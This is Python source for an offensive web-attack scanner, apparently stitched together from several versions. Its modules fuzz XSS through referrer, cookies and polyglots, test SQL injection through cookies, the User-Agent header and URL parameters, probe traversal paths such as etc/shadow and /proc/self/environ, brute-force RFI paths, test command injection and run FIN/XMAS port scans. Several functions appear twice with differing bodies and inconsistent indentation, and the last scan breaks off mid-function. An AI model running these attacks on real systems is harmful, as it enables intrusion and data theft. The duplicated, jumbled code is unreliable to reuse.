    def xssref0x00(web, parallel):
        """Run the referrer-based XSS check against *web*.

        Delegates to ``refatck`` with the module payload list ``pay`` —
        inline, or chunked across ``processes`` worker processes when
        *parallel* is set — then prints the payloads it returned and
        records the outcome through ``save_data``.
        """
        print(R + '\n     X S S  (Referrer Based)')
        print(R + '    ---<>----<>----<>----<>----\n')

        hits = []
        if parallel:
            # Roughly len(pay)/processes payloads per worker, as elsewhere in the module.
            chunks = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                jobs = [pool.apply_async(refatck, args=(chunk, web))
                        for chunk in chunks]
                for job in jobs:
                    hits.extend(job.get())
        else:
            hits.extend(refatck(pay, web))

        if not hits:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(referrer) no payload succeeded.")
            print(R + "\n [-] No payload succeeded." + C)
            return

        save_data(database, module, lvl1, lvl2, lvl3, name,
                  "XSS Vulnerability (Referrer) found! Payloads :> " + str(hits))
        print(" [+] XSS Vulnerability (Referrer) found! Successful payloads:")
        for hit in hits:
            print(hit)
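def xsspoly0x00(li, bug2, parallel):
    """Run the polyglot XSS fuzzer against the injectable URL *li*.

    Args:
        li: URL carrying the injection point; the fuzz only runs when it
            contains both ``?`` and ``=``.
        bug2: trailing query fragment re-appended after each payload
            (passed through to ``polyatck``).
        parallel: when true, the module list ``poly`` is split into
            ``processes`` chunks and ``polyatck`` runs in a process pool;
            otherwise it runs inline.

    Successful payloads returned by ``polyatck`` are printed; nothing is
    returned.
    """
    print(R + '\n     X S S  (Polyglot Fuzzer)')
    print(R + '    ——·‹›·––·‹›·——·‹›·——·‹›·––\n')

    success = []
    try:
        if '?' in str(li) and '=' in str(li):
            if not parallel:
                success += polyatck(poly, li, bug2)
            else:
                # The pool block belongs inside this branch: it previously
                # sat one level out, so the serial path raised NameError on
                # `paylists` right after polyatck had already run.
                paylists = listsplit(poly, round(len(poly) / processes))
                with Pool(processes=processes) as pool:
                    res = [
                        pool.apply_async(polyatck, args=(l, li, bug2))
                        for l in paylists
                    ]
                    for y in res:
                        success += y.get()
        if success:
            print(
                " [+] XSS Vulnerability (Polyglot) found! Successful payloads:"
            )
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)

    except KeyboardInterrupt:
        # Ctrl-C: the previous message here ("Payloads File does not exist")
        # had nothing to do with an interrupt.
        print(R + ' [-] User Requested Shutdown...')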
def atck(evasion, filepath, payloads, web00, bug2, parallel, gen_headers):
    """Probe *web00* with every path in *payloads* and report what came back.

    Serial mode builds each request URL here and calls ``check0x00``;
    parallel mode hands payload chunks to ``chkpre`` in a process pool.
    Both helpers return six lists in the same positional order (interesting
    paths, generic, logs, /proc/self/environ, /proc/self/fd, configuration),
    which are merged here and passed to ``outto0x00`` for display.
    """
    gotcha, generic, loggy, enviro, fud, cnfy = ([] for _ in range(6))
    buckets = (gotcha, generic, loggy, enviro, fud, cnfy)

    def merge(paths):
        # Positional merge; an index beyond what the helper returned raises
        # IndexError exactly as the explicit paths[0..5] form did.
        for idx, bucket in enumerate(buckets):
            bucket += paths[idx]

    if parallel:
        print(round(len(payloads) / processes))
        chunks = listsplit(payloads, round(len(payloads) / processes))
        with Pool(processes=processes) as pool:
            jobs = [
                pool.apply_async(
                    chkpre,
                    args=(evasion, filepath, chunk, web00, bug2, gen_headers))
                for chunk in chunks
            ]
            for job in jobs:
                merge(job.get())
    else:
        for pay in payloads:
            if evasion and filepath != "":
                # Substitute the caller-supplied path for the one embedded in
                # the wordlist entries.
                pay = pay.replace("etc/shadow", filepath)
            print(GR + '\n [*] Setting parameters...')
            web0x00 = web00 + pay + bug2
            print(C + ' [+] Using path : ' + B + str(pay))
            print(B + ' [+] Url : ' + GR + str(web0x00))
            merge(check0x00(web0x00, pay, gen_headers))

    if not gotcha:
        print(R + ' [-] No vulnerable paths found!')
        return

    print(G +
          "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha)))
    time.sleep(0.5)

    outto0x00("Logs", loggy)
    outto0x00("/proc/self/environ", enviro)
    outto0x00("/proc/self/fd", fud)
    outto0x00("Configuration", cnfy)
    outto0x00("Generic", generic)
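    def sqliuser0x00(web, parallel):
        """Blind (response-length) SQLi check through the User-Agent header.

        Fetches *web* once as a baseline, then re-requests it with each
        payload from the module list ``pay`` appended to a fixed User-Agent
        and flags any response whose body length differs from the baseline.
        With *parallel* set the comparison is delegated to ``userpre`` over a
        process pool.  Flagged payloads are collected in ``success`` and
        printed at the end.
        """
        print(R+'\n     S Q L i  (User-Agent Based)')
        print(R+'    ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n')

        client = session()
        # Baseline response; verify=False matches the other requests here.
        getrq = client.get(web, verify=False)
        success = []
        if not parallel:
            for i in pay:
                print(B+'\n [*] Using payload : '+C+i)
                time.sleep(0.7)
                user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' + 'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'}
                user_agent['User-agent'] += str(i)
                req = client.get(web, headers=user_agent, verify=False)
                print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent'])
                # Length difference is the only signal and can fire on any
                # dynamic page, so a hit is a candidate to confirm, not proof.
                if len(req.content) != len(getrq.content):
                    print(G+' [!] Blind based SQLi (User-Agent Based) Detected!')
                    print(R+' [!] User-Agent : '+O+user_agent['User-agent'])
                    # The serial path never recorded hits before, so the
                    # summary below always reported "no payload succeeded".
                    success.append(i)
        else:
            paylists = listsplit(pay, round(len(pay)/processes))
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(userpre, args=(web, l, getrq)) for l in paylists]
                for i in res:
                    success += i.get()
        if success:
            # Summary previously said "(Cookie)"; this is the User-Agent check.
            print(" [+] SQLi Vulnerability (User-Agent) found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded."+C)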
    def xssref0x00(web, parallel):
        """Referrer-based XSS check against *web*.

        Runs ``refatck`` over the module payload list ``pay`` — inline, or
        chunked across ``processes`` worker processes when *parallel* is
        set — and prints whatever payloads it returns.
        """
        print(R + '\n     X S S  (Referrer Based)')
        print(R + '    ——·‹›·––·‹›·——·‹›·——·‹›·––·\n')

        hits = []
        if parallel:
            chunks = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                jobs = [pool.apply_async(refatck, args=(chunk, web))
                        for chunk in chunks]
                for job in jobs:
                    hits.extend(job.get())
        else:
            hits.extend(refatck(pay, web))

        if not hits:
            print(R + "\n [-] No payload succeeded." + C)
            return

        print(" [+] XSS Vulnerability (Referrer) found! Successful payloads:")
        for hit in hits:
            print(hit)
    def xsscookie0x00(web, parallel):
        """Cookie-based XSS check; only proceeds if the first GET set cookies.

        Opens a fresh session, fetches *web*, and when the jar is non-empty
        hands the session to ``cookieatck`` (inline, or across a process
        pool when *parallel* is set) and prints the payloads it returned.
        """
        print(R+'\n     X S S  (Cookie Based)')
        print(R+'    ——·‹›·––·‹›·——·‹›·——·‹›\n')

        sleep(0.5)
        vsession = session()
        vsession.get(web)
        if not vsession.cookies:
            print(R+' [-] No support for cookies...')
            time.sleep(0.5)
            print(R+' [-] Cookie based injection not possible...')
            return

        print(G+' [+] This website supports session cookies...')
        hits = []
        if parallel:
            chunks = listsplit(pay, round(len(pay)/processes))
            with Pool(processes=processes) as pool:
                jobs = [pool.apply_async(cookieatck, args=(chunk, vsession, web))
                        for chunk in chunks]
                for job in jobs:
                    hits.extend(job.get())
        else:
            hits.extend(cookieatck(pay, vsession, web))

        if hits:
            print(" [+] XSS (Cookie) Vulnerability found! Successful payloads:")
            for hit in hits:
                print(hit)
        else:
            print(R + "\n [-] No payload succeeded."+C)
def manual0x00(web, parallel):
    """Interactive XSS test: ask for an endpoint, pick a parameter, fuzz it.

    *web* is the base URL.  The user types the path-plus-query (``bug``)
    and, when it has several ``&``-separated parameters, the name of the one
    to inject into.  The request URL is rebuilt as ``bugs + <payload> +
    bug2`` and handed to ``manualatck`` (inline, or chunked over a process
    pool when *parallel* is set).  If nothing succeeds the user is offered
    the polyglot fuzzer ``xsspoly0x00``.  Nothing is returned.
    """
    #print(R+'\n    ======================')
    print(R + '\n     X S S  (Manual Mode)')
    print(R + '    ——·‹›·––·‹›·——·‹›·––·‹\n')

    bug = input(O + ' [#] Injectable Endpoint' + R +
                ' (eg. /xss/search.php?q=drake)' + O + ' :> ')
    choice = ""
    if "&" in bug:
        ln = len(bug.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> "
            .format(ln))
        # Substring test only: a name that merely occurs inside another
        # parameter or value is accepted here.
        if not choice in bug:
            sys.exit(" [-] Param {} not found.".format(choice))
    # Everything up to and including "<choice>=" becomes the injection
    # prefix; with a single parameter `choice` is "" and the whole endpoint
    # is kept.
    bugs = web + bug.split(choice + '=')[0] + choice + '='
    bug2 = ""
    if choice != "":
        n = bug.split(choice + "=")[1]
        if "&" in n:
            # bug2 = text after the parameter name ("=value&other=...") with
            # "=value" removed, i.e. the trailing parameters re-appended after
            # each payload.  str.replace drops every occurrence of that text.
            bug2 = bug.split(choice)[1]
            tmp = bug2.split("&")[0]
            bug2 = bug2.replace(tmp, "")
    print(O + ' [!] Using Url : ' + GR + bugs + "INJECT" + bug2)
    if '?' in str(bugs) and '=' in str(bugs):
        success = []
        if not parallel:
            # NOTE(review): manualatck's return value is discarded here, so
            # `success` stays empty on the serial path and the "no payload
            # succeeded" branch always runs — confirm whether manualatck
            # returns a list as the parallel branch below assumes.
            manualatck(pay, bugs, bug2)
        else:
            paylists = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(manualatck, args=(
                        l,
                        bugs,
                        bug2,
                    )) for l in paylists
                ]
                for y in res:
                    i = y.get()
                    success += i
        if success:
            print(" [+] XSS Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            x = input(O + ' [#] Test Polyglots? (Y/n) :> ')
            if x == 'Y' or x == 'y':
                print(GR + ' [*] Proceeding fuzzing with polyglots...')
                xsspoly0x00(bugs, bug2, parallel)
            elif x == 'n' or x == 'N':
                print(C + ' [+] Okay!')
            else:
                print(GR + ' [-] U high dude?')

    else:
        print(R + ' [-] Enter an URL with scope parameter...')
        # Re-prompt by recursion; each invalid entry adds a stack frame.
        manual0x00(web, parallel)
    def sqlicookie0x00(web, parallel):
        """Error-based SQLi check through the session cookies of *web*.

        Opens a session, fetches *web*, and if the server set any cookies
        appends each payload from the module list ``pay`` to every cookie
        value and re-requests the page, flagging responses that contain one
        of the strings in ``check``.  With *parallel* set the work is
        delegated to ``cookiepre`` over a process pool.  Flagged payloads are
        printed; nothing is returned.
        """

        #print(R+'\n    =========================')
        print(R + '\n     S Q L i  (Cookie Based)')
        print(R + '    ––·‹›·––·‹›·––·‹›·––·‹›·–\n')

        sleep(0.5)
        vsession = session()
        req = vsession.get(web)
        # Markers searched for in the response body (plain substring match).
        check = ["have an error", "SQL syntax", "MySQL"]
        if vsession.cookies:
            print(G + ' [+] This website values session cookies...')
            success = []
            if not parallel:
                for i in pay:
                    print(B + " [*] Trying Payload : " + C + '' + i)
                    time.sleep(0.7)
                    for cookie in vsession.cookies:
                        # Mutates the jar's cookie object in place and is never
                        # undone, so each payload is appended on top of the
                        # previous ones for that cookie.
                        cookie.value += i
                        print(O + ' [+] Using ' + R + '!nfected' + O +
                              ' cookie : ' + GR + cookie.value)
                        r = vsession.get(web)
                        for j in range(0, len(check)):
                            if check[j] in r.text:
                                poc = C + " [+] PoC : " + O + cookie.name + " : " + GR + cookie.value
                                print(
                                    G +
                                    " [+] Error Based SQli (Cookie Based) Detected! "
                                )
                                print(poc)
                                print(P + ' [+] Code : ' + W + str(r.text) +
                                      '\n')
                                # One append per matching marker, so a payload
                                # can be listed more than once.
                                success.append(i)
            else:
                paylists = listsplit(pay, round(len(pay) / processes))
                with Pool(processes=processes) as pool:
                    res = [
                        pool.apply_async(cookiepre,
                                         args=(
                                             l,
                                             vsession,
                                             check,
                                             req,
                                         )) for l in paylists
                    ]
                    #res1 = pool.apply_async(portloop, )
                    for i in res:
                        j = i.get()
                        success += j
            if success:
                print(" [+] SQLi Vulnerability found! Successful payloads:")
                for i in success:
                    print(i)
            else:
                print(R + "\n [-] No payload succeeded." + C)
        else:
            print(R + ' [-] No support for cookies...')
            time.sleep(0.5)
            print(R + ' [-] Cookie based injection not possible...')
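def manual0x00(web, parallel):
    """Interactive error-based SQLi test against a user-supplied endpoint.

    *web* is the base URL.  The user types the path-plus-query and, when it
    has several ``&``-separated parameters, the name of the one to inject
    into.  Requests are built as ``bugs + <payload> + bug2`` where ``bugs``
    ends with ``<choice>=<original value>`` and ``bug2`` carries the other
    parameters.  Serial mode requests each payload here and looks for SQL
    error text in the body; parallel mode delegates chunks of the module
    list ``pay`` to ``manualpre`` in a process pool.  Payloads that produced
    an error are listed at the end; nothing is returned.
    """
    print(R+'\n     S Q L i  (Manual Mode)')
    print(R+'    ––·‹›·––·‹›·––·‹›·––·‹›·\n')
    client = session()
    bug = input(O+' [#] Injectable Endpoint'+R+' (eg. /sqli/fetch.php?id=x)'+O+' :> ')
    choice = ""
    if "&" in bug:
        ln = len(bug.split("&"))
        choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln))
        # Substring check only: any name occurring anywhere in the query passes.
        if choice not in bug:
            sys.exit(" [-] Param {} not found.".format(choice))

    bug2 = ""
    param1 = ""
    if choice != "":
        n = bug.split(choice + "=")[1]
        if "&" in n:
            bug2 = bug.split(choice+"=")[1]
            param1 = bug2.split("&")[0]   # original value of the chosen parameter
            # Drop that value so bug2 keeps only the trailing "&other=..." part
            # (str.replace removes every occurrence, not just the first).
            bug2 = bug2.replace(param1,"")

    bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1

    print(O+' [!] Using Url : '+GR+bugs)
    if '?' in str(bugs) and '=' in str(bugs):
        success = []
        if not parallel:
            for p in pay:
                bugged = bugs + str(p) + bug2
                print(B+" [*] Trying : "+C+bugged)
                time.sleep(0.7)
                response = client.get(bugged).text
                # Grouping kept as written: (error AND syntax AND SQL) OR Warning:
                if (('error' in response) and ('syntax' in response) and ('SQL' in response) or ('Warning:' in response)):
                    print('\n'+G+' [+] Vulnerable link detected : ' + bugged)
                    print(GR+' [*] Injecting payloads...')
                    print(B+' [!] PoC : ' + str(bugged))
                    print(R+" [!] Payload : " + O + p + '\033[0m')
                    print("\033[1m [!] Code Snippet :\n \033[0m" + str(response) + '\n')
                    # The serial path never recorded hits before, so the
                    # summary below contradicted the detection output.
                    success.append(p)
        else:
            paylists = listsplit(pay, round(len(pay)/processes))
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(manualpre, args=(l, bugs, bug2)) for l in paylists]
                for i in res:
                    success += i.get()
        if success:
            print(" [+] SQLi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded."+C)
    else:
        print(R+' [-] Enter an URL with scope parameter...')
        # Re-prompt by recursion; each invalid entry adds a stack frame.
        manual0x00(web, parallel)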
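    def sqliuser0x00(web, parallel):
        """Error-based SQLi check through the User-Agent header of *web*.

        Appends each payload from the module list ``pay`` to a fixed
        User-Agent, requests *web*, and flags responses whose body contains
        ``error``, ``syntax`` or ``mysql`` (case-insensitive for the last).
        With *parallel* set the check is delegated to ``userpre`` over a
        process pool.  Hits are printed and the outcome is recorded with
        ``save_data``; nothing is returned.
        """
        print(R + '\n     S Q L i  (User-Agent Based)')
        print(R + '    ---<>----<>----<>----<>----<>\n')
        success = []
        client = session()
        if not parallel:
            for i in pay:
                print(B + ' [*] Using payload : ' + C + i)
                time.sleep(0.7)
                user_agent = {
                    'User-agent':
                    'Mozilla/5.0 (X11; Ubuntu; Linux' +
                    'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
                }
                user_agent['User-agent'] += i
                req = client.get(web, headers=user_agent)
                print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR +
                      user_agent['User-agent'])
                # " ".join(req.text) used to put a space between every
                # character of the body, so none of the substrings below
                # could ever match; compare against the body itself.
                flag = req.text.strip()
                if 'error' in flag or 'syntax' in flag or 'mysql' in flag.lower():
                    print(
                        G +
                        '\n [!] Error based SQLi (User-Agent Based) Detected!')
                    print(R + ' [!] User-Agent : ' + O +
                          user_agent['User-agent'])
                    success.append(i)
        else:
            paylists = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(userpre, args=(l, web))
                    for l in paylists
                ]
                for i in res:
                    success += i.get()
        if success:
            data = "SQLi Vulnerability (useragent) found!\nSuccessful payloads: " + str(
                success)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(
                " [+] SQLi Vulnerability (useragent) found! Successful payloads:"
            )
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(useragent) no payload succeeded.")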
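def brute0x00(web, parallel):
    """Brute-force remote-file-inclusion paths against *web* from a wordlist.

    The wordlist path comes from ``properties["DICT"][1]``: a single space
    means "prompt the user", ``"none"`` means use the default, anything else
    is used as given.  Lines are appended to the module-level ``payloads``
    list and fed to ``checkbrute`` (inline, or chunked over a process pool
    when *parallel* is set).  Results are printed and persisted through
    ``save_data``; any exception is reported rather than propagated.
    """
    try:
        if properties["DICT"][1] == " ":
            print(O + ' [!] Enter path to payload file ' + R +
                  '(Default: files/fuzz-db/rfi_paths.lst)')
            fi = input(O + ' [§] Your input (Press Enter if default) :> ')
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]

        if fi == '':
            fi = 'files/fuzz-db/rfi_paths.lst'

        print(GR + ' [*] Importing wordlist...')
        if not os.path.exists(fi):
            # Previously a missing wordlist fell through with no output at all.
            print(R + ' [-] Wordlist not found : ' + str(fi))
            return

        print(G + ' [+] File path found!')
        time.sleep(0.6)
        print(O + ' [*] Importing wordlist...')
        with open(fi, 'r') as wew:
            for w in wew:
                # `payloads` is module-level and is not cleared here, so a
                # second call keeps the entries loaded by the first.
                payloads.append(w.strip('\n'))
        print(GR + ' [*] Starting bruteforce...')
        time.sleep(0.7)
        success = []
        if not parallel:
            success += checkbrute(payloads, web)
        else:
            paylists = listsplit(payloads,
                                 round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(checkbrute, args=(l, web))
                    for l in paylists
                ]
                for y in res:
                    success += y.get()
        if success:
            data = "Possible RFI at: " + str(success)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] Remote File Inclusion found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(brute) no payload succeeded.")

    except Exception as e:
        # Module boundary: report and return instead of propagating.
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))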
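def getPayloads(url, parallel):
    """Load command-injection payloads from a file and run them against *url*.

    The payload file comes from ``properties["DICT"][1]`` (a single space
    prompts the user, ``"none"`` selects the default path, anything else is
    used verbatim).  Each line is appended to the module-level ``payloads``
    list; ``check0x00`` then runs with a compiled regex of response markers
    — inline, or over a process pool when *parallel* is set.  Payloads it
    returns are printed; nothing is returned.
    """
    if properties["DICT"][1] == " ":
        print(O + ' [!] Enter path to payload file ' + R +
              '(Default: files/payload-db/rce_payloads.lst)')
        fi = input(O + ' [§] Your input (Press Enter if default) :> ')
    elif properties["DICT"][1].lower() == "none":
        fi = ""
    else:
        fi = properties["DICT"][1]

    if fi == '':
        fi = 'files/payload-db/rce_payloads.lst'

    print(GR + ' [*] Loading payloads...')
    time.sleep(0.8)
    try:
        with open(fi) as run:
            for p in run:
                # `payloads` is module-level and is not cleared here.
                payloads.append(p.replace('\n', ''))
    except Exception as e:
        # An unreadable file leaves `payloads` as it was; the run continues.
        print(R + ' [-] Exception: ' + str(e))
    # Was len(payloads) + 1, which over-reported the count by one.
    print(G + ' [+] ' + str(len(payloads)) + ' Payloads loaded!')
    # Raw string: the old literal relied on an invalid "\(" escape sequence.
    check = re.compile(
        r"51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot|root|x:bin",
        re.I)
    print(GR + ' [*] Starting command injection testing...')
    success = []
    if not parallel:
        # The serial path previously discarded check0x00's result, so
        # `success` was always empty and the summary always said "no payload".
        success += check0x00(url, payloads, check)
    else:
        paylists = listsplit(payloads, round(len(payloads) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(check0x00, args=(url, l, check))
                for l in paylists
            ]
            for y in res:
                success += y.get()
    if success:
        print(" [+] CMDi Vulnerability found! Successful payloads:")
        for i in success:
            print(i)
    else:
        print(R + "\n [-] No payload succeeded." + C)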
    def xsscookie0x00(web, parallel):
        """Cookie-based XSS check; only proceeds if the first GET set cookies.

        Opens a fresh session, fetches *web*, and when the jar is non-empty
        hands the session to ``cookieatck`` (inline, or across a process
        pool when *parallel* is set).  The payloads it returns are printed
        and every outcome — hits, no hits, or no cookies — is recorded
        through ``save_data``.
        """
        print(R + '\n     X S S  (Cookie Based)')
        print(R + '    ---<>----<>----<>----<>\n')

        sleep(0.5)
        vsession = session()
        vsession.get(web)
        if not vsession.cookies:
            print(R + ' [-] No support for cookies...')
            time.sleep(0.5)
            print(R + ' [-] Cookie based injection not possible...')
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No support for cookies. Cookie based injection not possible.")
            return

        print(G + ' [+] This website supports session cookies...')
        hits = []
        if parallel:
            chunks = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                jobs = [pool.apply_async(cookieatck, args=(chunk, vsession, web))
                        for chunk in chunks]
                for job in jobs:
                    hits.extend(job.get())
        else:
            hits.extend(cookieatck(pay, vsession, web))

        if not hits:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(cookie) no payload succeeded.")
            print(R + "\n [-] No payload succeeded." + C)
            return

        save_data(database, module, lvl1, lvl2, lvl3, name,
                  "XSS Vulnerability (Cookie) found! Payloads :> " + str(hits))
        print(" [+] XSS (Cookie) Vulnerability found! Successful payloads:")
        for hit in hits:
            print(hit)
def scan0x00(target):
    """Run a FIN scan of *target* over a user- or config-chosen port range.

    Port bounds come from ``properties["INIT"]`` / ``properties["FIN"]`` and
    verbosity from ``properties["VERBOSE"]``; a single space in any of them
    means "prompt the user".  The range is split into ``processes`` chunks
    and scanned by ``portloop`` in a process pool, each chunk returning
    (open/filtered, closed, filtered) port lists.  Results are printed as a
    table, recorded with ``save_data``, and timed.  Ctrl-C exits via quit().
    """
    try:
        from core.methods.print import pscan
        pscan("fin scan")
        #print(''+R+'\n          =================')
        #print(''+R + '           F I N   S C A N ')
        #print(''+R + '          =================')
        print(''+R + '   [Reliable only in LA Networks]\n')

        if properties["INIT"][1] == " ":
            min_port = input(C+' [§] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(C+' [§] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        openfil_ports = []
        filter_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)

        if properties["VERBOSE"][1] == " ":
            chk = input(C+' [?] Do you want a verbose output? (enter if not) :> ')
            verbose = chk != ""  # any non-empty answer enables verbose output
        else:
            verbose = properties["VERBOSE"][1] == "1"

        try:
            print(GR+' [*] Checking port range...')
            # NOTE: the upper bound accepts 65536 although the highest TCP
            # port is 65535; int() on bad input lands in the except below.
            if int(min_port) >= 0 and int(max_port) >= 0 and int(max_port) >= int(min_port) and int(max_port) <= 65536:
                print(P+' [!] Port range detected valid...'+C)
                time.sleep(0.3)
                print(GR+' [*] Preparing for the the FIN Scan...')
                pass
            else: # If range didn't raise error, but didn't meet criteria
                print(R+"\n [!] Invalid Range of Ports")
                print(R+" [!] Exiting...")
                quit()
        except Exception: # If input range raises an error
            print(R+"\n [!] Invalid Range of Ports")
            print(R+" [!] Exiting...")
            quit()


        ports = range(int(min_port), int(max_port)+1) # Build range from given port numbers (inclusive)
        starting_time = time.time() # Start clock for scan time

        checkhost(ip_host) # Run checkhost() function from earlier
        print(G+" [!] Scanning initiated at " + strftime("%H:%M:%S") + "!"+C+color.TR2+C+"\n") # Confirm scan start


        # One chunk of ~len(ports)/processes ports per worker; results are
        # collected in submission order.
        prtlst = listsplit(ports, round(len(ports)/processes))
        with Pool(processes=processes) as pool:
            res = [pool.apply_async(portloop, args=(l,verbose,ip_host,)) for l in prtlst]
            #res1 = pool.apply_async(portloop, )
            for i in res:
                j = i.get()
                openfil_ports += j[0]
                closed_ports += j[1]
                filter_ports += j[2]


        print(G+"\n [!] Scanning completed at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C)
        ending_time = time.time()
        total_time = ending_time - starting_time
        print(P+' [*] Preparing report...\n'+C)
        time.sleep(1)
        openports = "   {}{}{}{}{}{}{}{} ports open.".format(color.TR5,C, G, str(len(openfil_ports)), color.END, color.TR2, color.END, color.CURSIVE)
        summary("finscan", openports)
        print()
        print(P+'    +--------+------------------+')
        print(P+'    |  '+C+'PORT  '+P+'|       '+C+'STATE      '+P+'|')
        print(P+'    +--------+------------------+')

        if openfil_ports:
            # The port column is padded to 8 cells by digit count; only 1–5
            # digit values have a branch, which the range check above ensures.
            for i in sorted(openfil_ports):

                c = str(i)
                if len(c) == 1:
                    print(P+'    |   '+C+c+P+'    |       '+C+'OPEN       '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 2:
                    print(P+'    |   '+C+c+'   '+P+'|       '+C+'OPEN       '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 3:
                    print(P+'    |  '+C+c+'   '+P+'|       '+C+'OPEN       '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 4:
                    print(P+'    |  '+C+c+'  '+P+'|       '+C+'OPEN       '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 5:
                    print(P+'    | '+C+c+'  '+P+'|       '+C+'OPEN       '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
            data = "Open Ports: " + str(openfil_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)

        if filter_ports:
            for i in sorted(filter_ports):
                c = str(i)
                if len(c) == 1:
                    print(P+'    |   '+C+c+P+'    |       '+C+'FILTERED   '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 2:
                    print(P+'    |   '+C+c+'   '+P+'|       '+C+'FILTERED   '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 3:
                    print(P+'    |  '+C+c+'   '+P+'|       '+C+'FILTERED   '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 4:
                    print(P+'    |  '+C+c+'  '+P+'|       '+C+'FILTERED   '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
                elif len(c) == 5:
                    print(P+'    | '+C+c+'  '+P+'|       '+C+'FILTERED   '+P+'|')
                    print(P+'    +--------+------------------+')
                    time.sleep(0.2)
            data = "Filtered Ports: " + str(filter_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print('')
        else:
            # NOTE(review): this else pairs with `if filter_ports` only, so the
            # "no open/filtered ports" line (and its save_data record) is also
            # emitted when open ports were found but no filtered ones.
            print(''+R+" [-] No open/filtered ports found.!!"+'')
            save_data(database, module, lvl1, lvl2, lvl3, name, "No open/filtered ports found.")
        print(B+"\n [!] " + str(len(closed_ports)) + ' closed ports not shown')
        print(G+" [+] Host %s scanned in %s seconds" %(target, total_time)+C+color.TR2+C+"\n")
    except KeyboardInterrupt:
        print(R+"\n [-] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()
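def scan0x00(target):
    """Run the interactive XMAS port-scan module against ``target``.

    Prompts for a port range and a verbosity flag, resolves ``target``,
    checks that one ICMP echo can be sent to it, then splits the port range
    over a ``multiprocessing.Pool`` of ``portloop`` workers and prints a
    table of open|filtered and filtered ports. This variant only prints;
    it does not persist anything via ``save_data``.

    Args:
        target: hostname or dotted IP accepted by ``socket.gethostbyname``.

    Leaves the interpreter via ``quit()`` on an invalid port range, a failed
    host check or Ctrl-C, like the sibling scan modules in this file. Relies
    on module-level ``listsplit``, ``portloop``, ``processes``, ``conf``,
    ``sr1``/``IP``/``ICMP``, ``strftime`` and the colour constants.
    """
    try:
        from core.methods.print import pscan
        pscan("xmas scan")
        print(R + '   [Reliable only in LA Networks]\n')
        min_port = input(O + " [#] Enter Minumum Port Number -> ")
        max_port = input(O + " [#] Enter Maximum Port Number -> ")
        openfil_ports = []
        filter_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        chk = input(C +
                    ' [#] Do you want a verbose output? (enter if not) :> ')
        # ``!=`` rather than ``is not``: identity against a literal only
        # worked through string interning and is a SyntaxWarning on
        # Python >= 3.8.
        verbose = chk != ""

        try:
            print(GR + ' [*] Checking port range...')
            lo, hi = int(min_port), int(max_port)
            # 65535 is the highest TCP port; the old bound of 65536 admitted
            # one port number that cannot exist.
            if 0 <= lo <= hi <= 65535:
                print(G + '\033[1;32m [+] Port range detected valid...')
                time.sleep(0.3)
                print(GR + ' [*] Preparing for the the FIN Scan...')
            else:
                print(R + "\n [!] Invalid Range of Ports")
                print(" [!] Exiting...")
                quit()
        except ValueError:  # non-numeric input to int()
            print("\n\033[91m [!] Invalid Range of Ports")
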